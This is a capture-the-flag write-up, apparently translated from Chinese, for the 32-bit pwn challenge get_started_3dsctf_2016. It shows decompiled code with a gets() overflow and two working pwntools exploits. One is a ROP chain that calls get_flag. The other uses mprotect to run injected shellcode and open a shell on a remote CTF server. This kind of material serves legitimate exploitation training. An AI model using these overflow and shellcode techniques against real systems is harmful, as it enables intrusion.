get_ started_ 3dsctf_ two thousand and sixteen

get_started_3dsctf_2016

checksec Procedure is 32 Bit , Open some protection that is not a big problem ,ida to glance at

main function

int __cdecl main(int argc, const char **argv, const char **envp)
{
    
  char v4; // [esp+4h] [ebp-38h]

  printf("Qual a palavrinha magica? ", v4);
  gets(&v4); #gets Function can overflow indefinitely 
  return 0;
}

get_flag function

We construct a1 == 0x308CD64F && a2 == 0x195719D1 , then get_flag The return address of the function is filled in exit function , You can put the flag Bring it out

void __cdecl get_flag(int a1, int a2)
{
    
  int v2; // eax
  int v3; // esi
  unsigned __int8 v4; // al
  int v5; // ecx
  unsigned __int8 v6; // al

  if ( a1 == 0x308CD64F && a2 == 0x195719D1 ) #  Judge a1  and  a2 If it is equal to a given number, it reads flag
  {
    
    v2 = fopen("flag.txt", "rt");
    v3 = v2;
    v4 = getc(v2);
    if ( v4 != 255 )
    {
    
      v5 = (char)v4;
      do
      {
    
        putchar(v5);
        v6 = getc(v3);
        v5 = (char)v6;
      }
      while ( v6 != 255 );
    }
    fclose(v3);
  }
}

exp1

from pwn import *

io = process("./get_started_3dsctf_2016")

io = remote("node4.buuoj.cn",26448)
elf = ELF("./get_started_3dsctf_2016")

context(log_level="debug",arch="i386")
get_flag_addr = elf.symbols["get_flag"]
exit_addr = elf.symbols["exit"]
ret_addr = 0x08048196
a1 = 0x308CD64F
a2 = 0x195719D1

print hex(get_flag_addr),hex(exit_addr)

payload = flat(["a"*56,ret_addr,get_flag_addr,exit_addr,a1,a2])
io.sendline(payload)
io.recv()

mprotect function

Reference resources https://blog.csdn.net/qq_32095699/article/details/114225953

Simply put, this function can give permissions to the address , It's also Linux System function under , His three parameters
The first parameter is an address , It refers to the address where the operation is required .
The second parameter is the length of the address .
The third parameter is the permission to be granted .
These three parameters exist ebx esi ebp in

int __cdecl mprotect(int a1, int a2, int a3)
{
    
  int result; // eax

  result = dl_sysinfo(a2, a3);
  JUMPOUT(result, -4095, _syscall_error);
  return result;
}

May refer to https://www.wenjiangs.com/doc/dtkwp70q9e#ef45581adcf1589aa9c8efb9d4c10ec4

exp2

The second method is to use mprotect Function to give the address read and write permissions , Then go to the address shellcode Then the execution is called , It's not that complicated

from pwn import *

io = process("./get_started_3dsctf_2016")

io = remote("node4.buuoj.cn",26448)
elf = ELF("./get_started_3dsctf_2016")

context(log_level="debug",arch="i386")
mprotect_addr = elf.symbols["mprotect"]
read_plt = elf.symbols["read"]
pop_ebx_esi_ebp_ret = 0x0804f460 
buf = 0x8048000
print mprotect_addr

payload = flat(["a"*0x38,mprotect_addr,pop_ebx_esi_ebp_ret,buf,0x1000,0x7,read_plt,buf,0,buf,0x200])

io.sendline(payload)
shellcode = asm(shellcraft.sh(),arch='i386')
io.sendline(shellcode)

io.interactive()